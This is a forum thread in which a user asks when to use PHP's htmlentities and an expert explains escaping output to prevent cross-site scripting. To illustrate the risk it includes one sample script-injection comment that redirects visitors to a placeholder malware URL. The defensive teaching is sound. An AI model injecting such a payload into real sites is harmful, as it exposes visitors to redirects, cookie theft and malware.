By using this site, you agree to our updated Privacy Policy and our Terms of Use. Manage your Cookies Settings.
459,397 Members | 1,463 Online
Bytes IT Community
+ Ask a Question
Need help? Post your question and get tips & solutions from a community of 459,397 IT Pros & Developers. It's quick & easy.

practical example where to use htmlentities

pradeepjain
100+
P: 563
Hi i have read about htmlentities . i need to know when exactly should it be used,i.e some real world issues if its not used.
Mar 19 '10 #1
Share this Question
Share on Google+
3 Replies


Atli
Expert 5K+
P: 5,058
Hey.

The htmlentities function is used to make sure text can be safely printed into HTML. That is; it converts any character that might be read as part of the HTML markup, so that it will be displayed rather than parsed.

For example, the < and > characters have specific meaning in HTML. They are used as start and end delimiters for HTML tags. - If you wanted to print them as a part of text (as the "less-than" and "greater-than" characters) rather than have them be parsed as a part of the HTML markup, you need to convert them into HTML entities.

HTML entities are special character sequences that represent characters, so they can be printed into the HTML without messing it up. Like the < and > characters. Their HTML entities look like: "&lt;" and "&gt;".

The htmlentities() function takes a normal string and converts any character like < and > into their respective HTML entity.
Expand|Select|Wrap|Line Numbers
  1. <?php
  2. // Say I wanted to print this into a navigation bar...
  3. $navText = "Home > Category > Product"
  4.  
  5. // If I print that as it is, I risk messing up the HTML,
  6. // because > has special meaning in HTML markup.
  7.  
  8. // However, if I do this:
  9. $navText = htmlentities($navText);
  10.  
  11. // $navText becomes:
  12. // - "Home &gt; Category &gt; Product"
  13. // Which your browser will ignore while parsing the
  14. // HTML, but will display as:
  15. // - "Home > Category > Product"
  16. ?>
This is also a very important safety measure, to prevent XSS attacks. Websites that allow the public to add or edit text (like forums and comment sections) are a high-risk target for such attacks.

Consider if I were to post this as a comment on your site:
Expand|Select|Wrap|Line Numbers
  1. <script>location.href="http://example.com/install_virus.php";</script>
If you printed that as-is into your page, everybody who visited it would be redirected to the URL, which could do anything from flood your visitors with ads, steal their cookies or even abuse browser vulnerabilities to install viruses.

To protect your visitors from this, you can simply run the post through htmlentities before printing it, turning it into:
Expand|Select|Wrap|Line Numbers
  1. &lt;script&gt;location.href=&quot;http://example.com/install_virus.php&quot;;&lt;/script&gt;
Which the browser will print as the original text, rather than execute it as a part of the client-side code.
Mar 19 '10 #2

pradeepjain
100+
P: 563
okie i got the concept well. i use a DB driven application . where exactly htmlentities should be used. while printing the data from DB on the screen rite. any other specific task where i need to use htmlentities to prevent XSS attacks
Mar 19 '10 #3

Atli
Expert 5K+
P: 5,058
It should only be used when printing data to a HTML page. It doesn't really matter where the data is coming from; if it is going to be printed into a HTML page, it should be run through this function (or something equivalent).
Mar 19 '10 #4

Post your reply

Sign in to post your reply or Sign up for a free account.